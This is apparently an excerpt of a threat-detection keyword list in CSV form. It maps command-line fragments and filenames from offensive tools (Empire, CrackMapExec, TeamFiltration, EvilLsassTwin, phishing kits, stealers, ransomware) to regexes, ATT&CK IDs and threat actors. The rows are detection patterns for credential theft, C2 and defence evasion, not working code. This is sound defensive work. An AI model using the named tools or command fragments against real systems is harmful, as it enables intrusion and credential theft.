"* EncryptHub-WINRAR-*",".{0,1000}\sEncryptHub\-WINRAR\-.{0,1000}","offensive_tool_keyword","Kematian Stealer","Fake WinRar site distributes malware (+stealer +miner +hvnc +ransomware) from GitHub","T1195 - T1566 - T1569 - T1106 - T1486 - T1113","TA0001 - TA0002 - TA0005 - TA0006 - TA0007 - TA0009 - TA0010 - TA0011 - TA0040 - TA0043","N/A","N/A","Malware","https://github[.]com/sap3r-encrypthub/encrypthub","1","0","N/A","N/A","10","7","N/A","N/A","N/A","N/A","1046"
"* encryption_aes.exe*",".{0,1000}\sencryption_aes\.exe.{0,1000}","offensive_tool_keyword","RustRedOps","RustRedOps is a repository dedicated to gathering and sharing advanced techniques and offensive malware for Red Team","T1027.002  - T1053.005 - T1204.002 - T1588.002","TA0005 - TA0002 - TA0003 - TA0042","N/A","N/A","Exploitation tool","https://github.com/joaoviictorti/RustRedOps","1","0","N/A","N/A","10","10","1548","176","2025-04-20T18:50:04Z","2023-11-29T16:07:06Z","1047"
"* encryption_rc4.exe*",".{0,1000}\sencryption_rc4\.exe.{0,1000}","offensive_tool_keyword","RustRedOps","RustRedOps is a repository dedicated to gathering and sharing advanced techniques and offensive malware for Red Team","T1027.002  - T1053.005 - T1204.002 - T1588.002","TA0005 - TA0002 - TA0003 - TA0042","N/A","N/A","Exploitation tool","https://github.com/joaoviictorti/RustRedOps","1","0","N/A","N/A","10","10","1548","176","2025-04-20T18:50:04Z","2023-11-29T16:07:06Z","1048"
"* -endpoint * -adcs * -listenerport *",".{0,1000}\s\-endpoint\s.{0,1000}\s\-adcs\s.{0,1000}\s\-listenerport\s.{0,1000}","offensive_tool_keyword","KrbRelay-SMBServer","acts as an SMB server (instead of DCOM) to relay Kerberos AP-REQ to CIFS or HTTP","T1557 - T1021 - T1205 - T1071","TA0006 - TA0008 - TA0010","N/A","Black Basta","Lateral Movement","https://github.com/decoder-it/KrbRelay-SMBServer","1","0","N/A","N/A","9","3","215","26","2024-10-08T14:55:59Z","2024-10-05T12:28:55Z","1049"
"* endpoint_takeover.py*",".{0,1000}\sendpoint_takeover\.py.{0,1000}","offensive_tool_keyword","DoubleDrive","A fully-undetectable ransomware that utilizes OneDrive & Google Drive to encrypt target local files","T1486 - T1562.001 - T1213 - T1070.004 - T1070.006 - T1105","TA0040 - TA0009 - TA0011 - TA0005","N/A","N/A","Ransomware","https://github.com/SafeBreach-Labs/DoubleDrive","1","0","N/A","N/A","10","2","124","14","2024-05-28T16:25:59Z","2023-05-23T13:17:38Z","1050"
"* --enigma-path-x86 *",".{0,1000}\s\-\-enigma\-path\-x86\s.{0,1000}","offensive_tool_keyword","ProtectMyTooling","Multi-Packer wrapper letting us daisy-chain various packers obfuscators and other Red Team oriented weaponry","T1027 - T1202","TA0005","N/A","N/A","Resource Development","https://github.com/mgeeky/ProtectMyTooling","1","0","N/A","packer bundled","7","10","947","136","2024-12-06T20:10:02Z","2021-09-28T09:47:45Z","1051"
"* --enigma-protected-exe-cmdline *",".{0,1000}\s\-\-enigma\-protected\-exe\-cmdline\s.{0,1000}","offensive_tool_keyword","ProtectMyTooling","Multi-Packer wrapper letting us daisy-chain various packers obfuscators and other Red Team oriented weaponry","T1027 - T1202","TA0005","N/A","N/A","Resource Development","https://github.com/mgeeky/ProtectMyTooling","1","0","N/A","packer bundled","7","10","947","136","2024-12-06T20:10:02Z","2021-09-28T09:47:45Z","1052"
"* enip-info.nse*",".{0,1000}\senip\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","1053"
"* enum 127.0.0.1 *",".{0,1000}\senum\s127\.0\.0\.1\s.{0,1000}","offensive_tool_keyword","remote-method-guesser","remote-method-guesser?(rmg) is a?Java RMI?vulnerability scanner and can be used to identify and verify common security vulnerabilities on?Java RMI?endpoints.","T1210.002 - T1046 - T1078.003","TA0001 - TA0007 - TA0040","N/A","N/A","Vulnerability Scanner","https://github.com/qtc-de/remote-method-guesser","1","0","N/A","N/A","6","9","860","108","2024-07-03T19:40:54Z","2019-11-04T11:37:38Z","1054"
"* enum -passive -d *",".{0,1000}\senum\s\-passive\s\-d\s.{0,1000}","offensive_tool_keyword","thoth","Automate recon for red team assessments.","T1190 - T1083 - T1018","TA0007 - TA0043 - TA0001","N/A","N/A","Reconnaissance","https://github.com/r1cksec/thoth","1","0","N/A","N/A","7","1","95","10","2025-02-03T12:05:52Z","2021-11-15T13:40:56Z","1055"
"* --enum --validate-msol *",".{0,1000}\s\-\-enum\s\-\-validate\-msol\s.{0,1000}","offensive_tool_keyword","TeamFiltration","TeamFiltration is a cross-platform framework for enumerating, spraying, exfiltrating, and backdooring O365 AAD accounts","T1110 - T1087 - T1560.001 - T1592 - T1071","TA0001 - TA0003 - TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Flangvik/TeamFiltration","1","0","N/A","N/A","10","10","1132","128","2025-04-10T13:48:00Z","2022-06-28T00:00:28Z","1056"
"* --enum --validate-teams*",".{0,1000}\s\-\-enum\s\-\-validate\-teams.{0,1000}","offensive_tool_keyword","TeamFiltration","TeamFiltration is a cross-platform framework for enumerating, spraying, exfiltrating, and backdooring O365 AAD accounts","T1110 - T1087 - T1560.001 - T1592 - T1071","TA0001 - TA0003 - TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Flangvik/TeamFiltration","1","0","N/A","N/A","10","10","1132","128","2025-04-10T13:48:00Z","2022-06-28T00:00:28Z","1057"
"* enum_avproducts*",".{0,1000}\senum_avproducts.{0,1000}","offensive_tool_keyword","crackmapexec","crackmapexec command lines patterns. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct Lateral Movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002 - T1047","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater - ENERGETIC BEAR - EMBER BEAR - BERSERK BEAR - Black Basta","Credential Access","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","10","8690","1667","2023-12-06T17:09:42Z","2015-08-14T14:11:55Z","1058"
"* enum_chrome*",".{0,1000}\senum_chrome.{0,1000}","offensive_tool_keyword","crackmapexec","crackmapexec command lines patterns. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct Lateral Movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002 - T1047","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater - ENERGETIC BEAR - EMBER BEAR - BERSERK BEAR - Black Basta","Credential Access","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","10","8690","1667","2023-12-06T17:09:42Z","2015-08-14T14:11:55Z","1059"
"* enum_dns*",".{0,1000}\senum_dns.{0,1000}","offensive_tool_keyword","crackmapexec","crackmapexec command lines patterns. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct Lateral Movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002 - T1047","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater - ENERGETIC BEAR - EMBER BEAR - BERSERK BEAR - Black Basta","Credential Access","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","10","8690","1667","2023-12-06T17:09:42Z","2015-08-14T14:11:55Z","1060"
"* EnumBrowsers.ps1*",".{0,1000}\sEnumBrowsers\.ps1.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/r00t-3xp10it/redpill","1","0","N/A","N/A","10","3","218","52","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z","1061"
"* -Enumerate * -Module *",".{0,1000}\s\-Enumerate\s.{0,1000}\s\-Module\s.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER","Framework","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","1062"
"* EnumerateDCs.ahk*",".{0,1000}\sEnumerateDCs\.ahk.{0,1000}","offensive_tool_keyword","AutoPwnKey","red teaming framework and testing tool using AutoHotKey","T1059.007 - T1204.002 - T1564.004 - T1105 - T1087 - T1069 - T1027 - T1218 - T1548.002 - T1547 - T1056.001 - T1021.001 - T1102 - T1573 - T1499 - T1565","TA0001 - TA0007 - TA0005 - TA0004 - TA0003 - TA0006 - TA0008 - TA0011 - TA0040","N/A","N/A","Exploitation tool","https://github.com/CroodSolutions/AutoPwnKey","1","0","N/A","N/A","10","1","25","5","2025-04-11T21:52:48Z","2024-08-14T05:05:33Z","1063"
"* enumeration_process.exe*",".{0,1000}\senumeration_process\.exe.{0,1000}","offensive_tool_keyword","RustRedOps","RustRedOps is a repository dedicated to gathering and sharing advanced techniques and offensive malware for Red Team","T1027.002  - T1053.005 - T1204.002 - T1588.002","TA0005 - TA0002 - TA0003 - TA0042","N/A","N/A","Exploitation tool","https://github.com/joaoviictorti/RustRedOps","1","0","N/A","N/A","10","10","1548","176","2025-04-20T18:50:04Z","2023-11-29T16:07:06Z","1064"
"* --enum-local-admins*",".{0,1000}\s\-\-enum\-local\-admins.{0,1000}","offensive_tool_keyword","krbrelayx","Kerberos unconstrained delegation abuse toolkit","T1558.003 - T1098","TA0004 - TA0006","N/A","N/A","Exploitation tool","https://github.com/dirkjanm/krbrelayx","1","0","N/A","N/A","N/A","10","1281","181","2025-01-27T09:22:54Z","2019-01-08T18:42:07Z","1065"
"* -ep Bypass -enc $b64FileServerMonitoringScript*",".{0,1000}\s\-ep\sBypass\s\-enc\s\$b64FileServerMonitoringScript.{0,1000}","offensive_tool_keyword","Amnesiac","Amnesiac is a post-exploitation framework entirely written in PowerShell and designed to assist with Lateral Movement within Active Directory environments","T1021.002 - T1550.002","TA0008","N/A","Black Basta","Framework","https://github.com/Leo4j/Amnesiac","1","0","N/A","N/A","10","5","415","63","2025-03-18T09:32:04Z","2023-10-31T15:06:25Z","1066"
"* epmd-info.nse*",".{0,1000}\sepmd\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","1069"
"* eppc-enum-processes.nse*",".{0,1000}\seppc\-enum\-processes\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","1070"
"* EternalHushCore *",".{0,1000}\sEternalHushCore\s.{0,1000}","offensive_tool_keyword","EternalHushFramework","EternalHush Framework is a new open source project that is an advanced C&C framework. Designed specifically for Windows operating systems","T1071.001 - T1132.001 - T1059.003 - T1547.001","TA0011 - TA0005 - TA0010 - TA0002","N/A","Equation Group","C2","https://github.com/APT64/EternalHushFramework","1","0","N/A","N/A","10","10","11","1","2023-10-28T13:08:06Z","2023-07-09T09:13:21Z","1073"
"* etumbot.py*",".{0,1000}\setumbot\.py.{0,1000}","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tool","https://github.com/FortyNorthSecurity/Egress-Assess","1","0","N/A","can be used for data exfiltration simulation","8","7","647","144","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z","1074"
"* EtwHash*",".{0,1000}\sEtwHash.{0,1000}","offensive_tool_keyword","ETWHash","C# POC to extract NetNTLMv1/v2 hashes from ETW provider","T1556.001","TA0009 ","N/A","N/A","Credential Access","https://github.com/nettitude/ETWHash","1","0","N/A","N/A","N/A","3","256","29","2023-05-10T06:45:06Z","2023-04-26T15:53:01Z","1075"
"* etwunhook.cpp*",".{0,1000}\setwunhook\.cpp.{0,1000}","offensive_tool_keyword","etwunhook","Simple ETW unhook PoC. Overwrites NtTraceEvent opcode to disable ETW at Nt-function level.","T1055 - T1562.001","TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/Meowmycks/etwunhook","1","0","N/A","N/A","9","1","47","11","2024-02-29T10:07:52Z","2024-01-22T22:21:09Z","1076"
"* etwunhook.exe*",".{0,1000}\setwunhook\.exe.{0,1000}","offensive_tool_keyword","etwunhook","Simple ETW unhook PoC. Overwrites NtTraceEvent opcode to disable ETW at Nt-function level.","T1055 - T1562.001","TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/Meowmycks/etwunhook","1","0","N/A","N/A","9","1","47","11","2024-02-29T10:07:52Z","2024-01-22T22:21:09Z","1077"
"* -eval *caplets.update* ui.update*",".{0,1000}\s\-eval\s.{0,1000}caplets\.update.{0,1000}\sui\.update.{0,1000}","offensive_tool_keyword","bettercap","The Swiss Army knife for 802.11 -  BLE - IPv4 and IPv6 networks reconnaissance and MITM attacks.","T1046 - T1190 - T1059 - T1053 - T1001.002 - T1110.001 - T1113 - T1132 - T1048","TA0010 - TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/bettercap/bettercap","1","0","#linux","network exploitation tool","10","10","17525","1526","2025-04-16T22:28:20Z","2018-01-07T15:30:41Z","1078"
"* EventLogCredentials.ps1*",".{0,1000}\sEventLogCredentials\.ps1.{0,1000}","offensive_tool_keyword","EventLogMaster","Cobalt Strike Plugin - RDP Log Forensics & Clearing","T1070.001 - T1070.003 - T1070.004 - T1563.002","TA0005","N/A","N/A","Defense Evasion","https://github.com/QAX-A-Team/EventLogMaster","1","0","N/A","N/A","6","4","361","73","2019-12-23T10:31:35Z","2019-12-17T05:07:09Z","1079"
"* -EventName KeeThief -WMI*",".{0,1000}\s\-EventName\sKeeThief\s\-WMI.{0,1000}","offensive_tool_keyword","Powerlurk","PowerLurk is a PowerShell toolset for building malicious WMI Event Subsriptions","T1084 - T1059.001 - T1546.003 - T1053.005","TA0003 - TA0005 - TA0002 - TA0006","N/A","N/A","Persistence","https://github.com/Sw4mpf0x/PowerLurk","1","0","N/A","N/A","10","4","384","72","2016-07-25T22:19:22Z","2016-07-13T20:07:25Z","1080"
"* -EventName WmiBackdoor -PermanentCommand *",".{0,1000}\s\-EventName\sWmiBackdoor\s\-PermanentCommand\s.{0,1000}","offensive_tool_keyword","Powerlurk","PowerLurk is a PowerShell toolset for building malicious WMI Event Subsriptions","T1084 - T1059.001 - T1546.003 - T1053.005","TA0003 - TA0005 - TA0002 - TA0006","N/A","N/A","Persistence","https://github.com/Sw4mpf0x/PowerLurk","1","0","N/A","N/A","10","4","384","72","2016-07-25T22:19:22Z","2016-07-13T20:07:25Z","1081"
"* EventViewer-UACBypass*",".{0,1000}\sEventViewer\-UACBypass.{0,1000}","offensive_tool_keyword","EventViewer-UACBypass","RCE through Unsafe .Net Deserialization in Windows Event Viewer which leads to UAC bypass","T1078.004 - T1216 - T1068","TA0004 - TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/CsEnox/EventViewer-UACBypass","1","0","N/A","N/A","10","2","184","21","2022-04-29T09:42:37Z","2022-04-27T12:56:59Z","1082"
"* evil.corp *",".{0,1000}\sevil\.corp\s.{0,1000}","offensive_tool_keyword","spoolsploit","A collection of Windows print spooler exploits containerized with other utilities for practical exploitation.","T1204 - T1547 - T1562 - T1003 - T1018 - T1570 - T1005","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009","N/A","Black Basta","Exploitation tool","https://github.com/BeetleChunks/SpoolSploit","1","0","N/A","N/A","N/A","6","555","90","2021-07-16T04:49:43Z","2021-07-07T00:32:28Z","1083"
"* evil_DDL_trigger*",".{0,1000}\sevil_DDL_trigger.{0,1000}","offensive_tool_keyword","PowerUpSQL","PowerUpSQL includes functions that support SQL Server discovery. weak configuration auditing. privilege escalation on scale. and post exploitation actions such as OS command execution. It is intended to be used during internal penetration tests and red team engagements. However. PowerUpSQL also includes many functions that can be used by administrators to quickly inventory the SQL Servers in their ADS domain and perform common threat hunting tasks related to SQL Server.","T1078.002 - T1547.001 - T1059.001 - T1106 - T1550.002 - T1087 - T1003 - T1053 - T1047","TA0003 - TA0002 - TA0008 - TA0011 - TA0006","N/A","Black Basta","C2","https://github.com/NetSPI/PowerUpSQL","1","0","N/A","N/A","10","10","2564","472","2024-12-12T18:09:39Z","2016-06-22T01:22:39Z","1084"
"* evil_script.py*",".{0,1000}\sevil_script\.py.{0,1000}","offensive_tool_keyword","libprocesshider","Hide a process under Linux using the ld preloader","T1055 - T1564 - T1620","TA0005 ","N/A","Sandworm","Defense Evasion","https://github.com/gianlucaborello/libprocesshider","1","0","#linux","N/A","9","10","1061","320","2019-08-02T14:28:28Z","2014-08-16T01:09:30Z","1085"
"* EvilClippyManager*",".{0,1000}\sEvilClippyManager.{0,1000}","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","0","N/A","N/A","10","10","328","81","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z","1086"
"* evilginx*",".{0,1000}\sevilginx.{0,1000}","offensive_tool_keyword","gophish","Combination of evilginx2 and GoPhish","T1565-002 - T1565-003 - T1565-012 - T1110 - T1056-001 - T1113","TA0002 - TA0003","N/A","Black Basta","Phishing","https://github.com/fin3ss3g0d/evilgophish","1","0","N/A","N/A","10","10","1762","340","2024-06-15T17:48:11Z","2022-09-07T02:47:43Z","1087"
"* EvilnoVNC by @JoelGMSec*",".{0,1000}\sEvilnoVNC\sby\s\@JoelGMSec.{0,1000}","offensive_tool_keyword","EvilnoVNC","EvilnoVNC is a Ready to go Phishing Platform","T1566 - T1110 - T1555 - T1204 - T1592","TA0001 - TA0006 - TA0009","N/A","N/A","Phishing","https://github.com/ms101/EvilKnievelnoVNC","1","0","#linux #content","N/A","9","1","44","8","2025-03-08T19:34:41Z","2024-04-13T22:05:04Z","1088"
"* EvilnoVNC*",".{0,1000}\sEvilnoVNC.{0,1000}","offensive_tool_keyword","EvilnoVNC","EvilnoVNC is a Ready to go Phishing Platform","T1566 - T1110 - T1555 - T1204 - T1592","TA0001 - TA0006 - TA0009","N/A","N/A","Phishing","https://github.com/JoelGMSec/EvilnoVNC","1","0","N/A","N/A","9","10","960","169","2025-03-04T15:59:27Z","2022-09-04T10:48:49Z","1089"
"* evil-proxy*",".{0,1000}\sevil\-proxy.{0,1000}","offensive_tool_keyword","evil-proxy","A ruby http/https proxy to do EVIL things","T1557 - T1110.001 - T1563.001","TA0006 - TA0001 - TA0009 - TA0040","N/A","N/A","Phishing","https://github.com/bbtfr/evil-proxy","1","0","N/A","N/A","9","2","172","96","2023-10-30T07:49:40Z","2015-07-30T01:54:40Z","1090"
"* evil-proxy.rb*",".{0,1000}\sevil\-proxy\.rb.{0,1000}","offensive_tool_keyword","evil-proxy","A ruby http/https proxy to do EVIL things","T1557 - T1110.001 - T1563.001","TA0006 - TA0001 - TA0009 - TA0040","N/A","N/A","Phishing","https://github.com/bbtfr/evil-proxy","1","0","N/A","N/A","9","2","172","96","2023-10-30T07:49:40Z","2015-07-30T01:54:40Z","1091"
"* evilrdp.gui *",".{0,1000}\sevilrdp\.gui\s.{0,1000}","offensive_tool_keyword","evilrdp","Th evil twin of aardwolfgui using the aardwolf RDP client library that gives you extended control over the target and additional scripting capabilities from the command line.","T1021.001 - T1056.001 - T1113 - T1078.002 - T1105 - T1090.002 - T1059.001","TA0008 - TA0002 - TA0005 - TA0001 - TA0009 - TA0010 - TA0011","N/A","Black Basta","C2","https://github.com/skelsec/evilrdp","1","0","N/A","N/A","10","10","299","31","2025-03-15T13:37:21Z","2023-11-29T13:44:58Z","1092"
"* evilscript.ps1*",".{0,1000}\sevilscript\.ps1.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#windows","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","1093"
"* EvilTwinServer *",".{0,1000}\sEvilTwinServer\s.{0,1000}","offensive_tool_keyword","EvilLsassTwin","attempt to duplicate open handles to LSASS. If this fails it will obtain a handle to LSASS through the NtGetNextProcess function instead of OpenProcess/NtOpenProcess.","T1003.001 - T1055 - T1093","TA0006 - TA0005 - TA0002","N/A","N/A","Credential Access","https://github.com/RePRGM/Nimperiments/tree/main/EvilLsassTwin","1","0","N/A","N/A","9","2","151","18","2024-12-23T05:06:31Z","2022-09-13T12:42:13Z","1094"
"* -ExchHostname * -Password *",".{0,1000}\s\-ExchHostname\s.{0,1000}\s\-Password\s.{0,1000}","offensive_tool_keyword","MailSniper","MailSniper is a penetration testing tool for searching through email in a Microsoft Exchange environment for specific terms (passwords. insider intel. network architecture information. etc.). It can be used as a non-administrative user to search their own email. or by an administrator to search the mailboxes of every user in a domain.","T1087.003 - T1110.003 - T1114.002","TA0006 -TA0009 -TA0007","N/A","N/A","Credential Access","https://github.com/dafthack/MailSniper/blob/master/MailSniper.ps1","1","0","N/A","N/A","N/A","10","3046","580","2024-08-07T18:11:58Z","2016-09-08T00:36:51Z","1095"
"* --excludedcs*",".{0,1000}\s\-\-excludedcs.{0,1000}","offensive_tool_keyword","sharphound","C# Data Collector for BloodHound","T1087.001 - T1087.002 - T1482 - T1016 - T1018 - T1046","TA0007 - TA0043 - TA0005 - TA0042","Dispossessor - Trickbot - Dridex - Locky - Uyghur - BlackCat - ALPHV - Defray777 - RansomExx","APT20 - TA505 - APT29 - GOLD DUPONT - Scattered Spider - UNC3944 - TA2101 - Wizard Spider - Grim Spider - Lunar Spider - Dispossessor","Discovery","https://github.com/BloodHoundAD/SharpHound","1","0","N/A","N/A","N/A","10","904","195","2025-04-18T20:45:04Z","2021-07-12T17:07:04Z","1096"
"* exclusion.c /Fodefender.o*",".{0,1000}\sexclusion\.c\s\/Fodefender\.o.{0,1000}","offensive_tool_keyword","cobaltstrike","Collection of CobaltStrike beacon object files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/pwn1sher/CS-BOFs","1","0","N/A","N/A","10","10","103","22","2022-02-14T09:47:30Z","2021-01-18T08:54:48Z","1097"
"* -ExeArguments *",".{0,1000}\s\-ExeArguments\s.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER","Framework","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","1098"
